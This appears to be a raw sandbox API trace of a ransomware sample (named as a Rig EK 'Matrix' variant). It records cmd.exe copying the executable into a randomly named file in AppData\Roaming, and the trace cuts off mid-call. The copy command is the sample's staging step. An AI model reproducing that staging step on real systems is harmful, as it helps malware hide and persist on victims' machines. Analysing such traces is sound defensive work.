SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0092.689] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.689] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a7d41b0 | out: lpMode=0x4a7d41b0) returned 1 [0092.689] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.689] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0092.689] GetEnvironmentStringsW () returned 0x2b0178* [0092.689] FreeEnvironmentStringsW (penv=0x2b0178) returned 1 [0092.689] GetEnvironmentStringsW () returned 0x2b0178* [0092.689] FreeEnvironmentStringsW (penv=0x2b0178) returned 1 [0092.689] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ee34 | out: phkResult=0x14ee34*=0x40) returned 0x0 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x0, lpData=0x14ee40*=0xa0, lpcbData=0x14ee38*=0x1000) returned 0x2 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x4, lpData=0x14ee40*=0x1, lpcbData=0x14ee38*=0x4) returned 0x0 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x0, lpData=0x14ee40*=0x1, lpcbData=0x14ee38*=0x1000) returned 0x2 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x4, lpData=0x14ee40*=0x0, lpcbData=0x14ee38*=0x4) returned 0x0 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x4, lpData=0x14ee40*=0x40, lpcbData=0x14ee38*=0x4) returned 0x0 [0092.690] 
RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x4, lpData=0x14ee40*=0x40, lpcbData=0x14ee38*=0x4) returned 0x0 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x0, lpData=0x14ee40*=0x40, lpcbData=0x14ee38*=0x1000) returned 0x2 [0092.690] RegCloseKey (hKey=0x40) returned 0x0 [0092.690] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ee34 | out: phkResult=0x14ee34*=0x40) returned 0x0 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x0, lpData=0x14ee40*=0x40, lpcbData=0x14ee38*=0x1000) returned 0x2 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x4, lpData=0x14ee40*=0x1, lpcbData=0x14ee38*=0x4) returned 0x0 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x0, lpData=0x14ee40*=0x1, lpcbData=0x14ee38*=0x1000) returned 0x2 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x4, lpData=0x14ee40*=0x0, lpcbData=0x14ee38*=0x4) returned 0x0 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x4, lpData=0x14ee40*=0x9, lpcbData=0x14ee38*=0x4) returned 0x0 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", 
lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x4, lpData=0x14ee40*=0x9, lpcbData=0x14ee38*=0x4) returned 0x0 [0092.690] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ee3c, lpData=0x14ee40, lpcbData=0x14ee38*=0x1000 | out: lpType=0x14ee3c*=0x0, lpData=0x14ee40*=0x9, lpcbData=0x14ee38*=0x1000) returned 0x2 [0092.690] RegCloseKey (hKey=0x40) returned 0x0 [0092.690] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886347 [0092.690] srand (_Seed=0x5b886347) [0092.690] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\"" [0092.690] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\"" [0092.690] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a7d5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0092.691] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b18d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0092.691] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a7e0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0092.691] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a7e0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0092.691] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a7e0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0092.691] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0092.691] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0092.691] _wcsicmp (_String1="PROMPT", 
_String2="CMDEXTVERSION") returned 13 [0092.691] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0092.691] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0092.691] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0092.691] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0092.691] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0092.691] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0092.691] GetEnvironmentStringsW () returned 0x2b22c8* [0092.691] FreeEnvironmentStringsW (penv=0x2b22c8) returned 1 [0092.691] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a7e0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.691] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a7e0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0092.691] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0092.691] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0092.691] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0092.691] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0092.691] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0092.691] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0092.691] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0092.691] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0092.692] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14fc00 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0092.692] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14fc00, lpFilePart=0x14fbfc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14fbfc*="Desktop") returned 0x18 [0092.692] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0092.692] FindFirstFileW (in: 
lpFileName="C:\\Users", lpFindFileData=0x14f97c | out: lpFindFileData=0x14f97c) returned 0x2b0008 [0092.692] FindClose (in: hFindFile=0x2b0008 | out: hFindFile=0x2b0008) returned 1 [0092.692] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f97c | out: lpFindFileData=0x14f97c) returned 0x2b0008 [0092.692] FindClose (in: hFindFile=0x2b0008 | out: hFindFile=0x2b0008) returned 1 [0092.692] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f97c | out: lpFindFileData=0x14f97c) returned 0x2b0008 [0092.692] FindClose (in: hFindFile=0x2b0008 | out: hFindFile=0x2b0008) returned 1 [0092.692] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0092.692] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0092.692] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0092.692] GetEnvironmentStringsW () returned 0x2b2ae8* [0092.693] FreeEnvironmentStringsW (penv=0x2b2ae8) returned 1 [0092.693] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a7d5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0092.693] GetConsoleOutputCP () returned 0x1b5 [0092.693] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a7d4260 | out: lpCPInfo=0x4a7d4260) returned 1 [0092.693] GetUserDefaultLCID () returned 0x409 [0092.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a7d4950, cchData=8 | out: lpLCData=":") returned 2 [0092.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14fd40, cchData=128 | out: lpLCData="0") returned 2 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14fd40, cchData=128 | out: lpLCData="0") returned 2 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14fd40, cchData=128 | out: lpLCData="1") returned 2 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, 
lpLCData=0x4a7d4940, cchData=8 | out: lpLCData="/") returned 2 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a7d4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a7d4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a7d4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a7d4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a7d4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a7d4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a7d4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a7d4930, cchData=8 | out: lpLCData=".") returned 2 [0092.694] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a7d4920, cchData=8 | out: lpLCData=",") returned 2 [0092.694] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0092.695] GetConsoleTitleW (in: lpConsoleTitle=0x2a08d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.695] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0092.695] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0092.695] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0092.695] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0092.696] _wcsicmp (_String1="type", _String2=")") returned 75 [0092.696] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0092.696] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0092.696] _wcsicmp 
(_String1="IF", _String2="type") returned -11 [0092.696] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0092.696] _wcsicmp (_String1="REM", _String2="type") returned -2 [0092.696] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0092.700] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.700] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.700] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.700] GetFileType (hFile=0x7) returned 0x2 [0092.701] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.701] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14fc38 | out: lpMode=0x14fc38) returned 1 [0092.701] _dup (_FileHandle=1) returned 3 [0092.701] _close (_FileHandle=1) returned 0 [0092.701] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", _String2="con") returned -53 [0092.701] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x14fc08, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0092.701] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0092.702] GetConsoleTitleW (in: lpConsoleTitle=0x14fa38, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.702] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0092.702] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0092.702] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0092.702] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0092.703] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a7d5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0092.703] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE", fInfoLevelId=0x1, lpFindFileData=0x14f59c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 
lpFindFileData=0x14f59c) returned 0x2a0e20 [0092.704] _wcsicmp (_String1="2017-0~1.EXE", _String2=".") returned 4 [0092.704] _wcsicmp (_String1="2017-0~1.EXE", _String2="..") returned 4 [0092.704] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE" (normalized: "c:\\users\\eebsym5\\desktop\\2017-0~1.exe")) returned 0x20 [0092.704] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14e4a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0092.704] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0092.704] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.704] GetFileType (hFile=0x54) returned 0x1 [0092.704] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.704] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x14e500 | out: lpFileSizeHigh=0x14e500*=0x0) returned 0x7d600 [0092.704] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.704] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.704] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.704] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.705] GetFileType (hFile=0x4c) returned 0x1 [0092.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.705] GetFileType (hFile=0x4c) returned 0x1 [0092.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.705] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: 
lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.706] GetFileType (hFile=0x4c) returned 0x1 [0092.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.706] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.707] GetFileType (hFile=0x4c) returned 0x1 [0092.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.707] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.707] GetFileType (hFile=0x4c) returned 0x1 [0092.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.707] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.707] GetFileType (hFile=0x4c) returned 0x1 [0092.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.707] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] GetFileType (hFile=0x4c) returned 0x1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, 
lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] GetFileType (hFile=0x4c) returned 0x1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.709] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.709] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.709] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.709] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] GetFileType (hFile=0x4c) returned 0x1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] GetFileType (hFile=0x4c) returned 0x1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] GetFileType (hFile=0x4c) returned 0x1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.709] GetFileType (hFile=0x4c) returned 0x1 [0092.709] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0092.709] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] GetFileType (hFile=0x4c) returned 0x1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] GetFileType (hFile=0x4c) returned 0x1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] GetFileType (hFile=0x4c) returned 0x1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] GetFileType (hFile=0x4c) returned 0x1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.710] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.710] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) 
returned 1 [0092.710] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.710] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] GetFileType (hFile=0x4c) returned 0x1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] GetFileType (hFile=0x4c) returned 0x1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] GetFileType (hFile=0x4c) returned 0x1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] GetFileType (hFile=0x4c) returned 0x1 [0092.710] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.710] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] GetFileType (hFile=0x4c) returned 0x1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.711] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0092.711] GetFileType (hFile=0x4c) returned 0x1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] GetFileType (hFile=0x4c) returned 0x1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] GetFileType (hFile=0x4c) returned 0x1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, 